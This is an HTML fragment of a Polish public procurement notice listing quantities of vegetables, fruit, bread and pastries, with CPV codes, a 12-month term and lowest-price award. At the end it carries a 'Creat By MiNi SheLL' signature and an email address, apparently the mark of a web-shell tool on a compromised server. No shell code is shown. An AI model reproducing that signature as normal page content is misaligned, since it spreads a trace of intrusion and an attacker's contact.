<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Buraczki czerwone	kg	200
Cebula	kg	150
Cytryna 	kg	80
Czosnek w główkach-pochodzenia Polska	kg	10
Kapusta czerwona 	kg	200
Kapusta pekińska	kg	200
Kapusta biała	kg	150
Kapusta biała młoda    główka             (w okresie IV -VI)	szt.	30
Kapusta kiszona	kg                     	100
Ogórek kiszony 0,5 kg opakowanie	kg	100
Sałata lodowa	szt	100
 Rzodkiewka-pęczek	p	250
Szczypiorek-pęczek	p	220
Zielona pietruszka-pęczek	p	700
Koperek -pęczek	p	400
Ziemniaki (w okresie X - IV)	kg	4 000
Ziemniaki młode (od V) 	kg	1 300
Marchewka	kg	500
Pietruszka korzeń	kg	80
Seler świeży	kg	80
Por	szt	100
Kabaczki	kg	30
Pomidory 	kg	220
Ogórek szklarniowy	kg	250
Papryka czerwona 	Kg	40
Papryka zielona	kg.	15
Papryka żółta	kg	15
Pieczarki 	kg	60
Biała rzepa	kg            	20
Banany	kg	500
Pomarańcze	kg	750
Mandarynki	kg	600
Kiwi	kg	100
Jabłka	kg	2 000
Gruszki	kg	200
Brzoskwinie	kg	250
Nektarynki	kg	250
Truskawki	kg	100
Winogron czerwony	kg	100
Winogron biały	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa świeżego pieczywa i wyrobów cukierniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb  z ziarnami 0,6kg	szt	300
Chleb razowy 0,6kg	szt	150
Chleb pszenno-żytni 0,55kg	szt.	450
Chleb żytni 0,7kg	szt	100
Bułka zwykła 0,05kg	szt	7 000
Bułka grahamka 0,05kg	szt	7 000
Bułka z ziarnami 0,05kg	szt	5 500
Bułka maślana 0,05kg 	szt	7 000
Rogaliczki krucho-drożdżowe /małe/        	kg	150
Rogal maślany 0,05kg	szt	7 000
 Babka jogurtowo-maślana	kg	150
Bułka tarta 0,5kg	szt	160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com